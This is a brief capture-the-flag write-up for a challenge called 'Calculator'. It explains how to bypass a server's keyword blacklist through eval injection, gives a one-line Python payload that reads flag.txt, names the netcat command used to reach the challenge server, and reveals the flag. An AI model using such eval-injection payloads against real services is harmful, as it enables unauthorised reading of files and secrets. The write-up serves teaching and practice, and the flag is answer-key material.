Skip to content

Latest commit

 

History

History
35 lines (25 loc) · 721 Bytes

File metadata and controls

35 lines (25 loc) · 721 Bytes

Calculator

Author: Marin Radu


Description

Exploit an eval injection vulnerability by bypassing blacklists to read flag.txt.

Requirements

  • Eval injection
  • Blacklist bypass

Solve

Bypass the server's blacklist checks for the flag keyword by manipulating string cases or using alternative expressions. Connect to the server using netcat, and then craft a payload that reads flag.txt without triggering the blacklist:

# Sample Payload
open("FLAG.txt".lower()).read()

Execute this payload by sending it to the server after connecting with netcat:

nc chal.chronossec.site 30020

Flag: CSCTF{well_d0ne_kidd0}